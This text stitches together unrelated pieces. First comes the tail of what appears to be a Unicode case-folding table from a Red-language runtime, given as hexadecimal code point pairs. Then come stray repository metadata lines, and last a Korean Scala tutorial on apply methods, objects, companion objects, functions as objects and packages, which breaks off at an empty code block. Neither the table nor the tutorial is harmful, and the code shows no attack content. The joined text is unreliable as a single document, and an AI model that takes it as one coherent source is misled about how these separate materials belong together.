01D2h 01D3h 01D4h 01D5h 01D6h 01D7h 01D8h 01D9h 01DAh 01DBh 01DCh 01DEh 01DFh 01E0h 01E1h 01E2h 01E3h 01E4h 01E5h 01E6h 01E7h 01E8h 01E9h 01EAh 01EBh 01ECh 01EDh 01EEh 01EFh 01F1h 01F3h 01F2h 01F3h 01F4h 01F5h 01F6h 0195h 01F7h 01BFh 01F8h 01F9h 01FAh 01FBh 01FCh 01FDh 01FEh 01FFh 0200h 0201h 0202h 0203h 0204h 0205h 0206h 0207h 0208h 0209h 020Ah 020Bh 020Ch 020Dh 020Eh 020Fh 0210h 0211h 0212h 0213h 0214h 0215h 0216h 0217h 0218h 0219h 021Ah 021Bh 021Ch 021Dh 021Eh 021Fh 0220h 019Eh 0222h 0223h 0224h 0225h 0226h 0227h 0228h 0229h 022Ah 022Bh 022Ch 022Dh 022Eh 022Fh 0230h 0231h 0232h 0233h 023Ah 2C65h 023Bh 023Ch 023Dh 019Ah 023Eh 2C66h 0241h 0242h 0243h 0180h 0244h 0289h 0245h 028Ch 0246h 0247h 0248h 0249h 024Ah 024Bh 024Ch 024Dh 024Eh 024Fh 0370h 0371h 0372h 0373h 0376h 0377h 037Fh 03F3h 0386h 03ACh 0388h 03ADh 0389h 03AEh 038Ah 03AFh 038Ch 03CCh 038Eh 03CDh 038Fh 03CEh 0391h 03B1h 0392h 03B2h 0393h 03B3h 0394h 03B4h 0395h 03B5h 0396h 03B6h 0397h 03B7h 0398h 03B8h 0399h 03B9h 039Ah 03BAh 039Bh 03BBh 039Ch 03BCh 039Dh 03BDh 039Eh 03BEh 039Fh 03BFh 03A0h 03C0h 03A1h 03C1h 03A3h 03C3h 03A4h 03C4h 03A5h 03C5h 03A6h 03C6h 03A7h 03C7h 03A8h 03C8h 03A9h 03C9h 03AAh 03CAh 03ABh 03CBh 03CFh 03D7h 03D8h 03D9h 03DAh 03DBh 03DCh 03DDh 03DEh 03DFh 03E0h 03E1h 03E2h 03E3h 03E4h 03E5h 03E6h 03E7h 03E8h 03E9h 03EAh 03EBh 03ECh 03EDh 03EEh 03EFh 03F4h 03B8h 03F7h 03F8h 03F9h 03F2h 03FAh 03FBh 03FDh 037Bh 03FEh 037Ch 03FFh 037Dh 0400h 0450h 0401h 0451h 0402h 0452h 0403h 0453h 0404h 0454h 0405h 0455h 0406h 0456h 0407h 0457h 0408h 0458h 0409h 0459h 040Ah 045Ah 040Bh 045Bh 040Ch 045Ch 040Dh 045Dh 040Eh 045Eh 040Fh 045Fh 0410h 0430h 0411h 0431h 0412h 0432h 0413h 0433h 0414h 0434h 0415h 0435h 0416h 0436h 0417h 0437h 0418h 0438h 0419h 0439h 041Ah 043Ah 041Bh 043Bh 041Ch 043Ch 041Dh 043Dh 041Eh 043Eh 041Fh 043Fh 0420h 0440h 0421h 0441h 0422h 0442h 0423h 0443h 0424h 0444h 0425h 0445h 0426h 0446h 0427h 0447h 0428h 0448h 0429h 0449h 042Ah 044Ah 042Bh 044Bh 042Ch 044Ch 042Dh 044Dh 042Eh 044Eh 042Fh 044Fh 0460h 0461h 0462h 0463h 0464h 0465h 0466h 0467h 0468h 0469h 046Ah 046Bh 046Ch 046Dh 046Eh 046Fh 0470h 0471h 0472h 0473h 0474h 0475h 0476h 0477h 0478h 0479h 047Ah 047Bh 047Ch 047Dh 047Eh 047Fh 0480h 0481h 048Ah 048Bh 048Ch 048Dh 048Eh 048Fh 0490h 0491h 0492h 0493h 0494h 0495h 0496h 0497h 0498h 0499h 049Ah 049Bh 049Ch 049Dh 049Eh 049Fh 04A0h 04A1h 04A2h 04A3h 04A4h 04A5h 04A6h 04A7h 04A8h 04A9h 04AAh 04ABh 04ACh 04ADh 04AEh 04AFh 04B0h 04B1h 04B2h 04B3h 04B4h 04B5h 04B6h 04B7h 04B8h 04B9h 04BAh 04BBh 04BCh 04BDh 04BEh 04BFh 04C0h 04CFh 04C1h 04C2h 04C3h 04C4h 04C5h 04C6h 04C7h 04C8h 04C9h 04CAh 04CBh 04CCh 04CDh 04CEh 04D0h 04D1h 04D2h 04D3h 04D4h 04D5h 04D6h 04D7h 04D8h 04D9h 04DAh 04DBh 04DCh 04DDh 04DEh 04DFh 04E0h 04E1h 04E2h 04E3h 04E4h 04E5h 04E6h 04E7h 04E8h 04E9h 04EAh 04EBh 04ECh 04EDh 04EEh 04EFh 04F0h 04F1h 04F2h 04F3h 04F4h 04F5h 04F6h 04F7h 04F8h 04F9h 04FAh 04FBh 04FCh 04FDh 04FEh 04FFh 0500h 0501h 0502h 0503h 0504h 0505h 0506h 0507h 0508h 0509h 050Ah 050Bh 050Ch 050Dh 050Eh 050Fh 0510h 0511h 0512h 0513h 0514h 0515h 0516h 0517h 0518h 0519h 051Ah 051Bh 051Ch 051Dh 051Eh 051Fh 0520h 0521h 0522h 0523h 0524h 0525h 0526h 0527h 0528h 0529h 052Ah 052Bh 052Ch 052Dh 052Eh 052Fh 0531h 0561h 0532h 0562h 0533h 0563h 0534h 0564h 0535h 0565h 0536h 0566h 0537h 0567h 0538h 0568h 0539h 0569h 053Ah 056Ah 053Bh 056Bh 053Ch 056Ch 053Dh 056Dh 053Eh 056Eh 053Fh 056Fh 0540h 0570h 0541h 0571h 0542h 0572h 0543h 0573h 0544h 0574h 0545h 0575h 0546h 0576h 0547h 0577h 0548h 0578h 0549h 0579h 054Ah 057Ah 054Bh 057Bh 054Ch 057Ch 054Dh 057Dh 054Eh 057Eh 054Fh 057Fh 0550h 0580h 0551h 0581h 0552h 0582h 0553h 0583h 0554h 0584h 0555h 0585h 0556h 0586h 10A0h 2D00h 10A1h 2D01h 10A2h 2D02h 10A3h 2D03h 10A4h 2D04h 10A5h 2D05h 10A6h 2D06h 10A7h 2D07h 10A8h 2D08h 10A9h 2D09h 10AAh 2D0Ah 10ABh 2D0Bh 10ACh 2D0Ch 10ADh 2D0Dh 10AEh 2D0Eh 10AFh 2D0Fh 10B0h 2D10h 10B1h 2D11h 10B2h 2D12h 10B3h 2D13h 10B4h 2D14h 10B5h 2D15h 10B6h 2D16h 10B7h 2D17h 10B8h 2D18h 10B9h 2D19h 10BAh 2D1Ah 10BBh 2D1Bh 10BCh 2D1Ch 10BDh 2D1Dh 10BEh 2D1Eh 10BFh 2D1Fh 10C0h 2D20h 10C1h 2D21h 10C2h 2D22h 10C3h 2D23h 10C4h 2D24h 10C5h 2D25h 10C7h 2D27h 10CDh 2D2Dh 13A0h AB70h 13A1h AB71h 13A2h AB72h 13A3h AB73h 13A4h AB74h 13A5h AB75h 13A6h AB76h 13A7h AB77h 13A8h AB78h 13A9h AB79h 13AAh AB7Ah 13ABh AB7Bh 13ACh AB7Ch 13ADh AB7Dh 13AEh AB7Eh 13AFh AB7Fh 13B0h AB80h 13B1h AB81h 13B2h AB82h 13B3h AB83h 13B4h AB84h 13B5h AB85h 13B6h AB86h 13B7h AB87h 13B8h AB88h 13B9h AB89h 13BAh AB8Ah 13BBh AB8Bh 13BCh AB8Ch 13BDh AB8Dh 13BEh AB8Eh 13BFh AB8Fh 13C0h AB90h 13C1h AB91h 13C2h AB92h 13C3h AB93h 13C4h AB94h 13C5h AB95h 13C6h AB96h 13C7h AB97h 13C8h AB98h 13C9h AB99h 13CAh AB9Ah 13CBh AB9Bh 13CCh AB9Ch 13CDh AB9Dh 13CEh AB9Eh 13CFh AB9Fh 13D0h ABA0h 13D1h ABA1h 13D2h ABA2h 13D3h ABA3h 13D4h ABA4h 13D5h ABA5h 13D6h ABA6h 13D7h ABA7h 13D8h ABA8h 13D9h ABA9h 13DAh ABAAh 13DBh ABABh 13DCh ABACh 13DDh ABADh 13DEh ABAEh 13DFh ABAFh 13E0h ABB0h 13E1h ABB1h 13E2h ABB2h 13E3h ABB3h 13E4h ABB4h 13E5h ABB5h 13E6h ABB6h 13E7h ABB7h 13E8h ABB8h 13E9h ABB9h 13EAh ABBAh 13EBh ABBBh 13ECh ABBCh 13EDh ABBDh 13EEh ABBEh 13EFh ABBFh 13F0h 13F8h 13F1h 13F9h 13F2h 13FAh 13F3h 13FBh 13F4h 13FCh 13F5h 13FDh 1C90h 10D0h 1C91h 10D1h 1C92h 10D2h 1C93h 10D3h 1C94h 10D4h 1C95h 10D5h 1C96h 10D6h 1C97h 10D7h 1C98h 10D8h 1C99h 10D9h 1C9Ah 10DAh 1C9Bh 10DBh 1C9Ch 10DCh 1C9Dh 10DDh 1C9Eh 10DEh 1C9Fh 10DFh 1CA0h 10E0h 1CA1h 10E1h 1CA2h 10E2h 1CA3h 10E3h 1CA4h 10E4h 1CA5h 10E5h 1CA6h 10E6h 1CA7h 10E7h 1CA8h 10E8h 1CA9h 10E9h 1CAAh 10EAh 1CABh 10EBh 1CACh 10ECh 1CADh 10EDh 1CAEh 10EEh 1CAFh 10EFh 1CB0h 10F0h 1CB1h 10F1h 1CB2h 10F2h 1CB3h 10F3h 1CB4h 10F4h 1CB5h 10F5h 1CB6h 10F6h 1CB7h 10F7h 1CB8h 10F8h 1CB9h 10F9h 1CBAh 10FAh 1CBDh 10FDh 1CBEh 10FEh 1CBFh 10FFh 1E00h 1E01h 1E02h 1E03h 1E04h 1E05h 1E06h 1E07h 1E08h 1E09h 1E0Ah 1E0Bh 1E0Ch 1E0Dh 1E0Eh 1E0Fh 1E10h 1E11h 1E12h 1E13h 1E14h 1E15h 1E16h 1E17h 1E18h 1E19h 1E1Ah 1E1Bh 1E1Ch 1E1Dh 1E1Eh 1E1Fh 1E20h 1E21h 1E22h 1E23h 1E24h 1E25h 1E26h 1E27h 1E28h 1E29h 1E2Ah 1E2Bh 1E2Ch 1E2Dh 1E2Eh 1E2Fh 1E30h 1E31h 1E32h 1E33h 1E34h 1E35h 1E36h 1E37h 1E38h 1E39h 1E3Ah 1E3Bh 1E3Ch 1E3Dh 1E3Eh 1E3Fh 1E40h 1E41h 1E42h 1E43h 1E44h 1E45h 1E46h 1E47h 1E48h 1E49h 1E4Ah 1E4Bh 1E4Ch 1E4Dh 1E4Eh 1E4Fh 1E50h 1E51h 1E52h 1E53h 1E54h 1E55h 1E56h 1E57h 1E58h 1E59h 1E5Ah 1E5Bh 1E5Ch 1E5Dh 1E5Eh 1E5Fh 1E60h 1E61h 1E62h 1E63h 1E64h 1E65h 1E66h 1E67h 1E68h 1E69h 1E6Ah 1E6Bh 1E6Ch 1E6Dh 1E6Eh 1E6Fh 1E70h 1E71h 1E72h 1E73h 1E74h 1E75h 1E76h 1E77h 1E78h 1E79h 1E7Ah 1E7Bh 1E7Ch 1E7Dh 1E7Eh 1E7Fh 1E80h 1E81h 1E82h 1E83h 1E84h 1E85h 1E86h 1E87h 1E88h 1E89h 1E8Ah 1E8Bh 1E8Ch 1E8Dh 1E8Eh 1E8Fh 1E90h 1E91h 1E92h 1E93h 1E94h 1E95h 1E9Eh 00DFh 1EA0h 1EA1h 1EA2h 1EA3h 1EA4h 1EA5h 1EA6h 1EA7h 1EA8h 1EA9h 1EAAh 1EABh 1EACh 1EADh 1EAEh 1EAFh 1EB0h 1EB1h 1EB2h 1EB3h 1EB4h 1EB5h 1EB6h 1EB7h 1EB8h 1EB9h 1EBAh 1EBBh 1EBCh 1EBDh 1EBEh 1EBFh 1EC0h 1EC1h 1EC2h 1EC3h 1EC4h 1EC5h 1EC6h 1EC7h 1EC8h 1EC9h 1ECAh 1ECBh 1ECCh 1ECDh 1ECEh 1ECFh 1ED0h 1ED1h 1ED2h 1ED3h 1ED4h 1ED5h 1ED6h 1ED7h 1ED8h 1ED9h 1EDAh 1EDBh 1EDCh 1EDDh 1EDEh 1EDFh 1EE0h 1EE1h 1EE2h 1EE3h 1EE4h 1EE5h 1EE6h 1EE7h 1EE8h 1EE9h 1EEAh 1EEBh 1EECh 1EEDh 1EEEh 1EEFh 1EF0h 1EF1h 1EF2h 1EF3h 1EF4h 1EF5h 1EF6h 1EF7h 1EF8h 1EF9h 1EFAh 1EFBh 1EFCh 1EFDh 1EFEh 1EFFh 1F08h 1F00h 1F09h 1F01h 1F0Ah 1F02h 1F0Bh 1F03h 1F0Ch 1F04h 1F0Dh 1F05h 1F0Eh 1F06h 1F0Fh 1F07h 1F18h 1F10h 1F19h 1F11h 1F1Ah 1F12h 1F1Bh 1F13h 1F1Ch 1F14h 1F1Dh 1F15h 1F28h 1F20h 1F29h 1F21h 1F2Ah 1F22h 1F2Bh 1F23h 1F2Ch 1F24h 1F2Dh 1F25h 1F2Eh 1F26h 1F2Fh 1F27h 1F38h 1F30h 1F39h 1F31h 1F3Ah 1F32h 1F3Bh 1F33h 1F3Ch 1F34h 1F3Dh 1F35h 1F3Eh 1F36h 1F3Fh 1F37h 1F48h 1F40h 1F49h 1F41h 1F4Ah 1F42h 1F4Bh 1F43h 1F4Ch 1F44h 1F4Dh 1F45h 1F59h 1F51h 1F5Bh 1F53h 1F5Dh 1F55h 1F5Fh 1F57h 1F68h 1F60h 1F69h 1F61h 1F6Ah 1F62h 1F6Bh 1F63h 1F6Ch 1F64h 1F6Dh 1F65h 1F6Eh 1F66h 1F6Fh 1F67h 1F88h 1F80h 1F89h 1F81h 1F8Ah 1F82h 1F8Bh 1F83h 1F8Ch 1F84h 1F8Dh 1F85h 1F8Eh 1F86h 1F8Fh 1F87h 1F98h 1F90h 1F99h 1F91h 1F9Ah 1F92h 1F9Bh 1F93h 1F9Ch 1F94h 1F9Dh 1F95h 1F9Eh 1F96h 1F9Fh 1F97h 1FA8h 1FA0h 1FA9h 1FA1h 1FAAh 1FA2h 1FABh 1FA3h 1FACh 1FA4h 1FADh 1FA5h 1FAEh 1FA6h 1FAFh 1FA7h 1FB8h 1FB0h 1FB9h 1FB1h 1FBAh 1F70h 1FBBh 1F71h 1FBCh 1FB3h 1FC8h 1F72h 1FC9h 1F73h 1FCAh 1F74h 1FCBh 1F75h 1FCCh 1FC3h 1FD8h 1FD0h 1FD9h 1FD1h 1FDAh 1F76h 1FDBh 1F77h 1FE8h 1FE0h 1FE9h 1FE1h 1FEAh 1F7Ah 1FEBh 1F7Bh 1FECh 1FE5h 1FF8h 1F78h 1FF9h 1F79h 1FFAh 1F7Ch 1FFBh 1F7Dh 1FFCh 1FF3h 2126h 03C9h 212Ah 006Bh 212Bh 00E5h 2132h 214Eh 2160h 2170h 2161h 2171h 2162h 2172h 2163h 2173h 2164h 2174h 2165h 2175h 2166h 2176h 2167h 2177h 2168h 2178h 2169h 2179h 216Ah 217Ah 216Bh 217Bh 216Ch 217Ch 216Dh 217Dh 216Eh 217Eh 216Fh 217Fh 2183h 2184h 24B6h 24D0h 24B7h 24D1h 24B8h 24D2h 24B9h 24D3h 24BAh 24D4h 24BBh 24D5h 24BCh 24D6h 24BDh 24D7h 24BEh 24D8h 24BFh 24D9h 24C0h 24DAh 24C1h 24DBh 24C2h 24DCh 24C3h 24DDh 24C4h 24DEh 24C5h 24DFh 24C6h 24E0h 24C7h 24E1h 24C8h 24E2h 24C9h 24E3h 24CAh 24E4h 24CBh 24E5h 24CCh 24E6h 24CDh 24E7h 24CEh 24E8h 24CFh 24E9h 2C00h 2C30h 2C01h 2C31h 2C02h 2C32h 2C03h 2C33h 2C04h 2C34h 2C05h 2C35h 2C06h 2C36h 2C07h 2C37h 2C08h 2C38h 2C09h 2C39h 2C0Ah 2C3Ah 2C0Bh 2C3Bh 2C0Ch 2C3Ch 2C0Dh 2C3Dh 2C0Eh 2C3Eh 2C0Fh 2C3Fh 2C10h 2C40h 2C11h 2C41h 2C12h 2C42h 2C13h 2C43h 2C14h 2C44h 2C15h 2C45h 2C16h 2C46h 2C17h 2C47h 2C18h 2C48h 2C19h 2C49h 2C1Ah 2C4Ah 2C1Bh 2C4Bh 2C1Ch 2C4Ch 2C1Dh 2C4Dh 2C1Eh 2C4Eh 2C1Fh 2C4Fh 2C20h 2C50h 2C21h 2C51h 2C22h 2C52h 2C23h 2C53h 2C24h 2C54h 2C25h 2C55h 2C26h 2C56h 2C27h 2C57h 2C28h 2C58h 2C29h 2C59h 2C2Ah 2C5Ah 2C2Bh 2C5Bh 2C2Ch 2C5Ch 2C2Dh 2C5Dh 2C2Eh 2C5Eh 2C60h 2C61h 2C62h 026Bh 2C63h 1D7Dh 2C64h 027Dh 2C67h 2C68h 2C69h 2C6Ah 2C6Bh 2C6Ch 2C6Dh 0251h 2C6Eh 0271h 2C6Fh 0250h 2C70h 0252h 2C72h 2C73h 2C75h 2C76h 2C7Eh 023Fh 2C7Fh 0240h 2C80h 2C81h 2C82h 2C83h 2C84h 2C85h 2C86h 2C87h 2C88h 2C89h 2C8Ah 2C8Bh 2C8Ch 2C8Dh 2C8Eh 2C8Fh 2C90h 2C91h 2C92h 2C93h 2C94h 2C95h 2C96h 2C97h 2C98h 2C99h 2C9Ah 2C9Bh 2C9Ch 2C9Dh 2C9Eh 2C9Fh 2CA0h 2CA1h 2CA2h 2CA3h 2CA4h 2CA5h 2CA6h 2CA7h 2CA8h 2CA9h 2CAAh 2CABh 2CACh 2CADh 2CAEh 2CAFh 2CB0h 2CB1h 2CB2h 2CB3h 2CB4h 2CB5h 2CB6h 2CB7h 2CB8h 2CB9h 2CBAh 2CBBh 2CBCh 2CBDh 2CBEh 2CBFh 2CC0h 2CC1h 2CC2h 2CC3h 2CC4h 2CC5h 2CC6h 2CC7h 2CC8h 2CC9h 2CCAh 2CCBh 2CCCh 2CCDh 2CCEh 2CCFh 2CD0h 2CD1h 2CD2h 2CD3h 2CD4h 2CD5h 2CD6h 2CD7h 2CD8h 2CD9h 2CDAh 2CDBh 2CDCh 2CDDh 2CDEh 2CDFh 2CE0h 2CE1h 2CE2h 2CE3h 2CEBh 2CECh 2CEDh 2CEEh 2CF2h 2CF3h A640h A641h A642h A643h A644h A645h A646h A647h A648h A649h A64Ah A64Bh A64Ch A64Dh A64Eh A64Fh A650h A651h A652h A653h A654h A655h A656h A657h A658h A659h A65Ah A65Bh A65Ch A65Dh A65Eh A65Fh A660h A661h A662h A663h A664h A665h A666h A667h A668h A669h A66Ah A66Bh A66Ch A66Dh A680h A681h A682h A683h A684h A685h A686h A687h A688h A689h A68Ah A68Bh A68Ch A68Dh A68Eh A68Fh A690h A691h A692h A693h A694h A695h A696h A697h A698h A699h A69Ah A69Bh A722h A723h A724h A725h A726h A727h A728h A729h A72Ah A72Bh A72Ch A72Dh A72Eh A72Fh A732h A733h A734h A735h A736h A737h A738h A739h A73Ah A73Bh A73Ch A73Dh A73Eh A73Fh A740h A741h A742h A743h A744h A745h A746h A747h A748h A749h A74Ah A74Bh A74Ch A74Dh A74Eh A74Fh A750h A751h A752h A753h A754h A755h A756h A757h A758h A759h A75Ah A75Bh A75Ch A75Dh A75Eh A75Fh A760h A761h A762h A763h A764h A765h A766h A767h A768h A769h A76Ah A76Bh A76Ch A76Dh A76Eh A76Fh A779h A77Ah A77Bh A77Ch A77Dh 1D79h A77Eh A77Fh A780h A781h A782h A783h A784h A785h A786h A787h A78Bh A78Ch A78Dh 0265h A790h A791h A792h A793h A796h A797h A798h A799h A79Ah A79Bh A79Ch A79Dh A79Eh A79Fh A7A0h A7A1h A7A2h A7A3h A7A4h A7A5h A7A6h A7A7h A7A8h A7A9h A7AAh 0266h A7ABh 025Ch A7ACh 0261h A7ADh 026Ch A7AEh 026Ah A7B0h 029Eh A7B1h 0287h A7B2h 029Dh A7B3h AB53h A7B4h A7B5h A7B6h A7B7h A7B8h A7B9h FF21h FF41h FF22h FF42h FF23h FF43h FF24h FF44h FF25h FF45h FF26h FF46h FF27h FF47h FF28h FF48h FF29h FF49h FF2Ah FF4Ah FF2Bh FF4Bh FF2Ch FF4Ch FF2Dh FF4Dh FF2Eh FF4Eh FF2Fh FF4Fh FF30h FF50h FF31h FF51h FF32h FF52h FF33h FF53h FF34h FF54h FF35h FF55h FF36h FF56h FF37h FF57h FF38h FF58h FF39h FF59h FF3Ah FF5Ah 00010400h 00010428h 00010401h 00010429h 00010402h 0001042Ah 00010403h 0001042Bh 00010404h 0001042Ch 00010405h 0001042Dh 00010406h 0001042Eh 00010407h 0001042Fh 00010408h 00010430h 00010409h 00010431h 0001040Ah 00010432h 0001040Bh 00010433h 0001040Ch 00010434h 0001040Dh 00010435h 0001040Eh 00010436h 0001040Fh 00010437h 00010410h 00010438h 00010411h 00010439h 00010412h 0001043Ah 00010413h 0001043Bh 00010414h 0001043Ch 00010415h 0001043Dh 00010416h 0001043Eh 00010417h 0001043Fh 00010418h 00010440h 00010419h 00010441h 0001041Ah 00010442h 0001041Bh 00010443h 0001041Ch 00010444h 0001041Dh 00010445h 0001041Eh 00010446h 0001041Fh 00010447h 00010420h 00010448h 00010421h 00010449h 00010422h 0001044Ah 00010423h 0001044Bh 00010424h 0001044Ch 00010425h 0001044Dh 00010426h 0001044Eh 00010427h 0001044Fh 000104B0h 000104D8h 000104B1h 000104D9h 000104B2h 000104DAh 000104B3h 000104DBh 000104B4h 000104DCh 000104B5h 000104DDh 000104B6h 000104DEh 000104B7h 000104DFh 000104B8h 000104E0h 000104B9h 000104E1h 000104BAh 000104E2h 000104BBh 000104E3h 000104BCh 000104E4h 000104BDh 000104E5h 000104BEh 000104E6h 000104BFh 000104E7h 000104C0h 000104E8h 000104C1h 000104E9h 000104C2h 000104EAh 000104C3h 000104EBh 000104C4h 000104ECh 000104C5h 000104EDh 000104C6h 000104EEh 000104C7h 000104EFh 000104C8h 000104F0h 000104C9h 000104F1h 000104CAh 000104F2h 000104CBh 000104F3h 000104CCh 000104F4h 000104CDh 000104F5h 000104CEh 000104F6h 000104CFh 000104F7h 000104D0h 000104F8h 000104D1h 000104F9h 000104D2h 000104FAh 000104D3h 000104FBh 00010C80h 00010CC0h 00010C81h 00010CC1h 00010C82h 00010CC2h 00010C83h 00010CC3h 00010C84h 00010CC4h 00010C85h 00010CC5h 00010C86h 00010CC6h 00010C87h 00010CC7h 00010C88h 00010CC8h 00010C89h 00010CC9h 00010C8Ah 00010CCAh 00010C8Bh 00010CCBh 00010C8Ch 00010CCCh 00010C8Dh 00010CCDh 00010C8Eh 00010CCEh 00010C8Fh 00010CCFh 00010C90h 00010CD0h 00010C91h 00010CD1h 00010C92h 00010CD2h 00010C93h 00010CD3h 00010C94h 00010CD4h 00010C95h 00010CD5h 00010C96h 00010CD6h 00010C97h 00010CD7h 00010C98h 00010CD8h 00010C99h 00010CD9h 00010C9Ah 00010CDAh 00010C9Bh 00010CDBh 00010C9Ch 00010CDCh 00010C9Dh 00010CDDh 00010C9Eh 00010CDEh 00010C9Fh 00010CDFh 00010CA0h 00010CE0h 00010CA1h 00010CE1h 00010CA2h 00010CE2h 00010CA3h 00010CE3h 00010CA4h 00010CE4h 00010CA5h 00010CE5h 00010CA6h 00010CE6h 00010CA7h 00010CE7h 00010CA8h 00010CE8h 00010CA9h 00010CE9h 00010CAAh 00010CEAh 00010CABh 00010CEBh 00010CACh 00010CECh 00010CADh 00010CEDh 00010CAEh 00010CEEh 00010CAFh 00010CEFh 00010CB0h 00010CF0h 00010CB1h 00010CF1h 00010CB2h 00010CF2h 000118A0h 000118C0h 000118A1h 000118C1h 000118A2h 000118C2h 000118A3h 000118C3h 000118A4h 000118C4h 000118A5h 000118C5h 000118A6h 000118C6h 000118A7h 000118C7h 000118A8h 000118C8h 000118A9h 000118C9h 000118AAh 000118CAh 000118ABh 000118CBh 000118ACh 000118CCh 000118ADh 000118CDh 000118AEh 000118CEh 000118AFh 000118CFh 000118B0h 000118D0h 000118B1h 000118D1h 000118B2h 000118D2h 000118B3h 000118D3h 000118B4h 000118D4h 000118B5h 000118D5h 000118B6h 000118D6h 000118B7h 000118D7h 000118B8h 000118D8h 000118B9h 000118D9h 000118BAh 000118DAh 000118BBh 000118DBh 000118BCh 000118DCh 000118BDh 000118DDh 000118BEh 000118DEh 000118BFh 000118DFh 00016E40h 00016E60h 00016E41h 00016E61h 00016E42h 00016E62h 00016E43h 00016E63h 00016E44h 00016E64h 00016E45h 00016E65h 00016E46h 00016E66h 00016E47h 00016E67h 00016E48h 00016E68h 00016E49h 00016E69h 00016E4Ah 00016E6Ah 00016E4Bh 00016E6Bh 00016E4Ch 00016E6Ch 00016E4Dh 00016E6Dh 00016E4Eh 00016E6Eh 00016E4Fh 00016E6Fh 00016E50h 00016E70h 00016E51h 00016E71h 00016E52h 00016E72h 00016E53h 00016E73h 00016E54h 00016E74h 00016E55h 00016E75h 00016E56h 00016E76h 00016E57h 00016E77h 00016E58h 00016E78h 00016E59h 00016E79h 00016E5Ah 00016E7Ah 00016E5Bh 00016E7Bh 00016E5Ch 00016E7Ch 00016E5Dh 00016E7Dh 00016E5Eh 00016E7Eh 00016E5Fh 00016E7Fh 0001E900h 0001E922h 0001E901h 0001E923h 0001E902h 0001E924h 0001E903h 0001E925h 0001E904h 0001E926h 0001E905h 0001E927h 0001E906h 0001E928h 0001E907h 0001E929h 0001E908h 0001E92Ah 0001E909h 0001E92Bh 0001E90Ah 0001E92Ch 0001E90Bh 0001E92Dh 0001E90Ch 0001E92Eh 0001E90Dh 0001E92Fh 0001E90Eh 0001E930h 0001E90Fh 0001E931h 0001E910h 0001E932h 0001E911h 0001E933h 0001E912h 0001E934h 0001E913h 0001E935h 0001E914h 0001E936h 0001E915h 0001E937h 0001E916h 0001E938h 0001E917h 0001E939h 0001E918h 0001E93Ah 0001E919h 0001E93Bh 0001E91Ah 0001E93Ch 0001E91Bh 0001E93Dh 0001E91Ch 0001E93Eh 0001E91Dh 0001E93Fh 0001E91Eh 0001E940h 0001E91Fh 0001E941h 0001E920h 0001E942h 0001E921h 0001E943h ]
Red
3
0xflotus/red
runtime/case-folding-table.reds
[ "BSL-1.0", "BSD-3-Clause" ]
--- prev: basics.textile next: collections.textile title: 기초(계속) layout: post --- 이번 강좌에서 다루는 내용은 다음과 같다. * "apply 메소드":#apply * "객체":#object * "함수도 객체다":#fnobj * "패키지":#package * "패턴 매치":#match * "케이스 클래스":#caseclass * "try-catch-finally 예외 처리":#exception h2(#apply). apply 메소드 apply 메소드를 사용하면 클래스나 객체의 용도가 주로 하나만 있는 경우를 아주 멋지게 표현할 수 있다. <pre> scala> class Foo {} defined class Foo scala> object FooMaker { | def apply() = new Foo | } defined module FooMaker scala> val newFoo = FooMaker() newFoo: Foo = Foo@5b83f762 </pre> 위와 같이 사용하거나, 다음과 같이 쓸 수 있다. <pre> scala> class Bar { | def apply() = 0 | } defined class Bar scala> val bar = new Bar bar: Bar = Bar@47711479 scala> bar() res8: Int = 0 </pre> apply를 정의하면 메소드를 호출하듯 객체 인스턴스를 호출할 수 있다. 객체 인스턴스를 호출하면 그 객체(클래스)에 정의된 apply()가 호출된다. 자세한 것은 나중에 살펴볼 것이다. h2(#object). 객체 객체(여기서는 object 키워드로 선언하는 객체를 말함)는 클래스의 유일한 인스턴스를 넣기 위해 사용한다. 보통 팩토리에 사용된다. <pre> object Timer { var count = 0 def currentCount(): Long = { count += 1 count } } </pre> 위와 같이 정의하면 다음과 같이 사용할 수 있다. <pre> scala> Timer.currentCount() res0: Long = 1 </pre> 클래스와 객체가 같은 이름을 가질 수도 있다. 이런 객체는 '짝 객체(Companion Object)'라 한다. 보통 팩토리를 만들 때 짝 객체를 사용한다. 다음 예는 'new'를 사용하지 않고 새 객체를 만들 수 있음을 보여준다. <pre> class Bar(foo: String) object Bar { def apply(foo: String) = new Bar(foo) } </pre> h2(#fnobj). 함수는 객체이다 스칼라에 대해 이야기할 떄, 객체-함수형 프로그래밍이라는 말을 하고는 한다. 그 말이 무슨 뜻일까? 함수란 실제로 무엇일까? 함수는 트레잇의 집합이다. 구체적으로 말하자면, 인자를 하나만 받는 함수는 <code>Function1</code> 트레잇의 인스턴스이다. 이 트레잇에는 앞에서 설명했던 <code>apply()</code>가 정의되어 있다. 따라서 함수를 호출하듯 객체를 호출할 수 있다. <pre> scala> object addOne extends Function1[Int, Int] { | def apply(m: Int): Int = m + 1 | } defined module addOne scala> addOne(1) res2: Int = 2 </pre> 스칼라에는 Function이 1부터 22까지 준비되어 있다. 22인 이유는? 그냥 그렇게 정한 것이다. 저자는 인자가 22개 보다 더 많이 필요한 함수를 본 적이 없다. 22개면 충분하리라 본다. apply를 통한 편리 문법(syntactic sugar)을 통해 객체와 함수 프로그래밍 양쪽을 잘 통합할 수 있다. 여러분은 클래스를 여기저기 넘기면서 함수 처럼 호출해 사용할 수 있고, 함수는 한꺼풀 벗겨보면 단지 클래스의 인스턴스일 뿐이다. 그렇다면 클래스의 메소드를 정의할 때마다 실제로 Function*의 인스턴스가 만들어지는 걸까? 아니다. 클래스 내부의 메소드는 메소드이다. repl(read eval print loop. 입력을 받아 값을 계산하고 결과를 출력하는 루프. 스칼라 인터프리터라 생각하면 대략 맞다)에서 정의한 개별 메소드는 Function*의 인스턴스이다. Function*을 확장한 클래스를 정의할 수도 있다. 물론 이런 클래스도 ()로 호출할 수 있다. <pre> scala> class AddOne extends Function1[Int, Int] { | def apply(m: Int): Int = m + 1 | } defined class AddOne scala> val plusOne = new AddOne() plusOne: AddOne = <function1> scala> plusOne(1) res0: Int = 2 </pre> <code>extends Function1[Int, Int]</code>는 <code>extends (Int => Int)</code>라고 더 알아보기 쉽게 쓸 수 있다. <pre> class AddOne extends (Int => Int) { def apply(m: Int): Int = m + 1 } </pre> h2(#package). 패키지 코드를 패키지로 구성할 수 있다. <pre> package com.twitter.example </pre> 위와 같이 파일의 맨 앞에서 선언하면 파일 내의 모든 것이 위 패키지 안에 포함된다. 값이나 함수는 클래스나 객체 바깥에 존재할 수 없다. 객체(여기서도 object로 선언한 객체를 의미함)를 사용하면 정적인(자바의 정적 함수와 동일) 함수를 관리하기 쉽다. <pre> package com.twitter.example object colorHolder { val BLUE = "Blue" val RED = "Red" } </pre> 이제 직접 객체의 멤버를 사용할 수 있다. <pre> 